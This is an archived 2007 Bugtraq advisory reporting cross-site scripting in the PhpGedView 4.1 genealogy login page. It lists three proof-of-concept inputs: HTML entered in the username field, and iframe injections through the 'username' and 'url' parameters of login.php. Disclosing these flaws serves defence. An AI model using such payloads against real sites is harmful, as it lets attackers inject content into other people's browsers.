PhpGedView login page multiple XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PhpGedView login page multiple XSS
From: morin.josh@xxxxxxxxx
Date: 27 Aug 2007 21:22:51 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Vendor Site: http://www.phpgedview.net
Version: 4.1
Common Path: yoursite.com/genealogy/login.php

Overview: Genealogy program which allows you to view and edit your genealogy on 
your website. It fails to sufficiently sanitize user-supplied input data in 
"User Name" text box leaving password blank and pressing the "Login" button, 
also web address XSS. 

Example:
1.<html><font color="Red"><b>XSS</b></font></html>
2.yoursite.com/genealogy/login.php?login.php?action=login&username="><iframe>
3.yousite.com/genealogy/login.php?url=/index.php?JOSH="><iframe>

Discovered by: Joshua Morin

Prev by Date: BIND 8 EOL and BIND 8 DNS Cache Poisoning (Amit Klein, Trusteer)
Next by Date: HPSBUX02249 SSRT071442 rev.1 HP-UX Running the Ignite-UX or the DynRootDisk (DRD) get_system_info Command, Local Unqualified Configuration Change
Previous by thread: Re: BIND 8 EOL and BIND 8 DNS Cache Poisoning (Amit Klein, Trusteer)
Next by thread: HPSBUX02249 SSRT071442 rev.1 HP-UX Running the Ignite-UX or the DynRootDisk (DRD) get_system_info Command, Local Unqualified Configuration Change
Index(es):
- Date
- Thread